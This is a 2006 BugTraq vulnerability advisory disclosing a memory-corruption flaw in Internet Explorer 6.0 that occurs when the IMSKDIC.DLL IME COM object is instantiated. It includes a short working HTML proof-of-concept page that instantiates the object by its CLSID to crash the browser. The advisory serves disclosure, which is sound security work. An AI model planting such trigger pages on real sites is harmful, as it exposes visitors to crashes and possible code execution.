BugTraq
[XSec-06-02]: Internet Explorer (IMSKDIC.DLL) COM Object Instantiation Vulnerability Aug 15 2006 03:15PM
nop (nop xsec org)
Advisory ID:
XSec-06-02

Advisory Name:
Internet Explorer (IMSKDIC.DLL) COM Object Instantiation Vulnerability

Release Date:
08/15/2006

Tested on:
Internet Explorer 6.0 SP1 on Microsoft Windows XP SP2 CN

Affected version:
Internet Explorer 6.0

Author:
nop <nop#xsec.org>
http://www.xsec.org

Overview:
A vulnerability has been found in Internet Explorer 6.0. When Internet Explorer tries to instantiate the IMSKDIC.DLL (Microsoft IME) COM object as an ActiveX control, it may corrupt system memory in such a way that an attacker may DoS and possibly could execute arbitrary code.

Exploit:
=============== IMSKDIC.DLL.htm start ================

<!--
// Internet Explorer (IMSKDIC.DLL) COM Object Instantiation Vulnerability
// tested XP SP2 CN

// nop (nop#xsec.org)
// http://www.xsec.org

// CLSID: {6E3197A3-BBC3-11D4-84C0-00C04F7A06E5}
// Info: Microsoft IME SingleKanjiDictionary interface
// ProgID: IMESingleKanjiDict.8.1
// InprocServer32: C:\WINDOWS\IME\imjp8_1\Applets\IMSKDIC.DLL

--!>
<html><body>
<object classid="CLSID:{6E3197A3-BBC3-11D4-84C0-00C04F7A06E5}" ></object>
</body></html>

=============== IMSKDIC.DLL.htm end ==================

Link:
http://www.xsec.org/index.php?module=releases&act=view&type=1&id=8

About XSec:
We are redhat.

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus